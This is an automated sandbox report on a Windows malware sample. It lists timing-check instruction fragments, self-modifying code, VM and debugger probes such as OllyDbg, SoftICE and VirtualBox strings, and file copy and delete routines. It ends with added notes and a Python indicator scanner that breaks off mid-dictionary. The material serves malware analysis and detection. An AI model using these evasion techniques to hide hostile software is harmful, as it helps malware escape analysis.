                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE975 second address: 13FE981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE981 second address: 13FE987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13931DE second address: 13931FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF1CBF1D55h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13931FD second address: 1393203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDD25 second address: 13FDD48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FAF1CBF1D46h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE143 second address: 13FE14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE14D second address: 13FE166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D53h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE423 second address: 13FE42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAF1CCF5656h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE561 second address: 13FE565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE565 second address: 13FE569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE569 second address: 13FE579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FAF1CBF1D46h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402C15 second address: 1402C3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007FAF1CCF5656h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FAF1CCF5666h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403C5A second address: 1403C6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AE2C second address: 146AE30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AE30 second address: 146AE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AE38 second address: 146AE47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AE47 second address: 146AE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FAF1CBF1D4Eh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnp 00007FAF1CBF1D46h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1476A45 second address: 1476A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5669h 0x00000009 js 00007FAF1CCF5656h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1475395 second address: 1475399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1475399 second address: 14753B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FAF1CCF5660h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14753B3 second address: 14753EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FAF1CBF1D4Ah 0x0000000b popad 0x0000000c jne 00007FAF1CBF1D53h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FAF1CBF1D4Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAF1CBF1D54h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14753EF second address: 14753F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14759A4 second address: 14759B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF1CBF1D46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14759B0 second address: 14759C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5660h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14759C4 second address: 14759D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FAF1CBF1D52h 0x0000000c je 00007FAF1CBF1D46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1475B31 second address: 1475B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1475B35 second address: 1475B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147671B second address: 1476725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1476725 second address: 147672B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147672B second address: 1476731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1476731 second address: 147673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148C0A7 second address: 148C0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FAF1CCF5665h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF1CCF565Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148C0D3 second address: 148C0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E931 second address: 148E937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E937 second address: 148E941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF1CBF1D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E796 second address: 148E7A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FAF1CCF5656h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E7A3 second address: 148E7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAF1CBF1D51h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AD620 second address: 14AD62A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CCF5672h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC536 second address: 14AC53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC53B second address: 14AC551 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAF1CCF565Ch 0x00000008 jg 00007FAF1CCF5656h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FAF1CCF5656h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC551 second address: 14AC557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ACD35 second address: 14ACD60 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b ja 00007FAF1CCF5656h 0x00000011 jmp 00007FAF1CCF5661h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FAF1CCF5656h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ACD60 second address: 14ACD64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AD320 second address: 14AD324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B0001 second address: 14B0005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B01D7 second address: 14B01E1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B04AA second address: 14B04B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B04B4 second address: 14B04DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jg 00007FAF1CCF5658h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007FAF1CCF5658h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B33CC second address: 14B33E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FAF1CBF1D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push edi 0x0000000f jnl 00007FAF1CBF1D46h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B4F2D second address: 14B4F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF1CCF5669h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B4F4B second address: 14B4F55 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF1CBF1D4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604DC second address: 4E604E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604E1 second address: 4E604E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C0h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604E8 second address: 4E6050E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FAF1CCF5662h 0x0000000d push eax 0x0000000e pushad 0x0000000f mov edx, 6C5DF864h 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cx, dx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6050E second address: 4E6051C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6051C second address: 4E60520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60520 second address: 4E60526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60526 second address: 4E60576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FAF1CCF5667h 0x0000000b or si, BFDEh 0x00000010 jmp 00007FAF1CCF5669h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAF1CCF565Dh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60576 second address: 4E60587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60587 second address: 4E6058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6060A second address: 4E60642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAF1CBF1D53h 0x0000000a adc si, 301Eh 0x0000000f jmp 00007FAF1CBF1D59h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60642 second address: 4E60648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60648 second address: 4E6064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D06FB second address: 13D06FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 121D9CF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 121DAB4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13C726D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13C5B39 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13C5760 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13EB617 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 121D97E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decision graph_0-39042
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F440F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F3E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F447C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F3F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F31710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F3DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F44B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F43B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F3BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F3EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F3DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F31160 GetSystemInfo,ExitProcess,0_2_00F31160
                Source: file.exe, file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2113114519.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareV9
                Source: file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37855
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37858
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37868
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37877
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37909
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37743
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F34610 VirtualProtect ?,00000004,00000100,000000000_2_00F34610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F49BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F49AA0 mov eax, dword ptr fs:[00000030h]0_2_00F49AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F47690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00F47690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard
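The window class names, SoftICE device names and DebugPort queries listed above are the classic runtime anti-analysis probes the sample performs (FindWindow-style lookups for OllyDbg and the Sysinternals monitors, CreateFile on the \\.\NTICE, \\.\SICE and \\.\SIWVID driver devices, a DebugPort query on its own process), and the memory strings in the previous section (the VBOX__ DSDT key, VMwareVMware, Hyper-V RAW, Oreans.vxd, Software\WinLicense) are their static counterparts. When a sandbox run is not available, the same capability can be read off a memory dump or unpacked image with a string scan that handles both narrow and UTF-16LE strings. The script below is an added example, not part of the report or of any Joe Sandbox tooling: the indicator strings are the ones listed on this page, while the category grouping, the names INDICATORS, scan and assess, and the dump are mine, and the dump is a constructed byte string rather than this sample's memory.

```python
"""Scan a memory dump or unpacked image for the anti-analysis strings this report lists."""
import re
from collections import Counter

# indicator (lower-case) -> (category, meaning). The strings are the ones in the
# report above; the grouping into categories is mine.
INDICATORS = {
    "ollydbg": ("debugger", "OllyDbg window class"),
    "gbdyllo": ("debugger", "window class probed together with OllyDbg"),
    "regmonclass": ("sysinternals_monitor", "Regmon window class"),
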